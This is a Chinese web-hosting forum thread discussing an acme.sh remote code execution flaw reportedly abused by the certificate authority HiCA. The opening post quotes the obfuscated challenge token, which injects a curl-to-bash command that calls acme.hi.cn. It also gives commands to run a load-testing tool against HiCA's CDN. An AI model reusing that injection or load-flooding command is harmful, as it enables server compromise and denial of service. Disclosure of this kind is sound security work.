全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 4938|回复: 13
打印 上一主题 下一主题

剑皇 - acme.sh远程代码执行

[复制链接]
跳转到指定楼层
1#
发表于 2023-6-9 20:10:21 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
acme.sh 存在 RCE 漏洞,已经被国产 HiCA 利用
https://github.com/acmesh-official/acme.sh/issues/4659

{
    Type: http-01
    URL: ../pki-validation
    Status: pending
    Token: dd#acme.hi.cn/acme/v2/precheck-http/123456/654321#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/123456/654321?o=$_w|bash)#
    KeyAuthorization: dd#acme.hi.cn/acme/v2/precheck-http/123456/654321#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/123456/654321?o=$_w|bash)#.GfCBN3dYnfNB-Hj1nBYek89o9ohtt9K59uacS13wigw
}

相关讨论:
https://www.v2ex.com/t/947389
https://推特.com/mholt6/status/1666920303279349760
关于 HiCA:https://www.v2ex.com/t/868344

官网和acme.hi.cn用的阿里云WAF(已关闭),支付链接是腾讯云CDN:



wget https://github.com/maintell/webBenchmark/releases/download/0.6/webBenchmark_linux_x64
chmod 755 webBenchmark_linux_x64
./webBenchmark_linux_x64 -c 512 -s https://tencentcloud.accelerate.pki.plus/assets/wasm/wasm.wasm
推荐
发表于 2023-6-12 08:46:44 | 只看该作者
本帖最后由 elgt 于 2023-6-12 08:49 编辑


有人急了
推荐
发表于 2023-6-12 23:53:48 | 只看该作者

没错,你爹急了
推荐
发表于 2023-6-9 20:17:44 | 只看该作者
国产CA又立功了
推荐
发表于 2023-6-12 09:28:01 | 只看该作者
justfkqq 发表于 2023-6-12 08:56
https://tencentcloud.accelerate.pki.plus/assets/wasm/wasm.wasm
跳转到白宫的网站了?

没有,应该是停用了
推荐
发表于 2023-6-12 09:23:02 来自手机 | 只看该作者
elgt 发表于 2023-6-12 08:46
有人急了

它越急,越不能停

点评

这是你老爹告诉你母的,对吧二字  发表于 2023-6-13 01:35
3#
发表于 2023-6-9 20:28:04 | 只看该作者
acme.sh 最近手动命令,现在默认好像是 ZeroSSL?
HiCA 是什么鬼,没听过说。。。
4#
发表于 2023-6-10 21:05:22 来自手机 | 只看该作者
前几天才搞完泛域名  。。
6#
发表于 2023-6-12 08:56:46 | 只看该作者
https://tencentcloud.accelerate.pki.plus/assets/wasm/wasm.wasm
跳转到白宫的网站了?
7#
发表于 2023-6-12 09:15:49 | 只看该作者
所以大概是啥意思,有大佬翻译一下没
8#
发表于 2023-6-12 09:21:05 | 只看该作者
mhsl 发表于 2023-6-12 09:15
所以大概是啥意思,有大佬翻译一下没

就是利用acme.sh脚本权限漏洞,加点料,给申请ssl加入付款收费环节
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-27 19:32 , Processed in 0.069456 second(s), 11 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表